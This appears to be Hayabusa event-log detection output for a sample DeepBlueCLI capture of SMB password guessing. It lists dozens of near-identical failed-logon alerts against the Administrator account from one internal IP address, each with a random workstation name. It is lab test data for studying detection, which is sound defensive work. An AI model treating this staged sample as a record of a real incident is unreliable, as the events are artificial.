2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HW5jP389jmqSkzF1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: enhsof25BdDPcI2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4acsPMLUJRrT7mmL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hi1dzny6hpyr5N3d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RlPVBSnDMlE0QZaJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: th72TwMoRXtDVWge  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KGTTiJSkErjzoUUC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xyzZwNLltF0cYnai  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gYWVQ6mCqyBfDm3m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rg2x2lv9JeS5Bb6l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fU28NKC3WYxFGbMN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EUWDXgnogGDXizWj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXhAtnNcQKOIsuGS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cKfrJwI3OGdjL4af  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VdekC160hU7YzrK9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: enOBuzd6jwu8rZCH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eAjLjDlZSps5D49t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rY6CONLBVygSTnY5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6FIHgz2yqqbD9zfV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d82RRXgSmZdnfa8I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xA3ZWnWc9CoGeKpm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FvSYKi8KvEtnmSbs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IvxXI1u0AwtNHNSU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OFIy6Cps3Rm87Kqf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: slL3aPBnZl3lVJst  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O98P1oP3AU4lZp2D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EZZ7wIJNZ0CG7fMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7RhwHCqXQytvcaom  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xumaxbBEMZqL6pPO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ur1yZIwgB3ecNJGw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xAuGcKYRcLe0z3bl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmMi0edfBJ8KoJst  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlnoKbUb9jiqJD7t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hBeWGNkWTSp3nje8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2iwM6jPgNjZ3q5qb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xdkrA9Kwzero8eSk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Tb2ZvuJMxOfsxIT6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PBMBRPdATYpLNmyI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P1CKprAPSw4hgiBB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y8qtzwuGJfQG4XB7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: auOf2GwkoymLh4bC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2YcMYQ4sA2GfMwCS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YL1iM6WUtZIjIoTI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t7ruxdEGdeP3RLqF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZFXBpUJzafGYIggt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MC1K9nNLupH0NuSS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6rVfBLm10US9II19  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SBhAVHHtR7lZ1C3z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FKuUH8lMELYHibxF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UytgJLBtGRMCf3ar  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yno9399gUI2oBr4H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbsqE98qy27Sp0UJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c8RjXtDnXvCXSJ2w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2EdRXJJ1RCl8n9bd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8tnwGNp2ncfcBlFL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iGKEloPpd6CtrSlg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LBvHz5iKl0dl97xj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A0FPIXCc5FlKMLaL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c7Li2NqHgSIetZka  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MuIRFiXBUqrJeMbx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zxJNU05FkPwhcYxj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TWifHaaBiypAGkKi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L9VByeO8vHGSOJK3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ns12T94itDDRxYxC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z8jplFaHgwrWpFY8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fQ9L626fGZQkNC25  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HfplQ16d7lsObzki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c30ILHx5sYZCMflg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GMsJKiYmbgbr9wF0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q2hpQI6z68MVBzoW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iDgzJjXBnWDSVjdg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0XU5HdsnM0Lvpvq2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pjmtkv6JDb4s2WnR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
